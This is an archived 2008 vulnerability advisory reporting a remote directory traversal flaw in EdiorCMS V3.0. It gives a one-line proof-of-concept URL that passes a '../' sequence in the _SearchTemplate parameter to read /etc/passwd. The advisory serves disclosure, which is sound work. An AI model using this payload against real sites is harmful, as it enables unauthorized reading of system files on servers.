TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: bx2376.htm
EdiorCMS V3.0 directory traversal

Directory traversal in EdiorCMS V3.0 Directory traversal in EdiorCMS V3.0


Directory traversal in EdiorCMS V3.0 =0D
=0D
Application:  EdiorCMS V3.0=0D
Vendor:	 http://www.edior.com	=0D 
Versions:     3.0=0D
Platforms:    ALL=0D
Bug:          Directory traversal=0D
Exploitation: remote=0D
Date:         13 Mar 2008=0D
Author:       Shennan Wang=0D
e-mail: wsn1983@gmail.com=0D 
POC: http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd=0D 
              =0D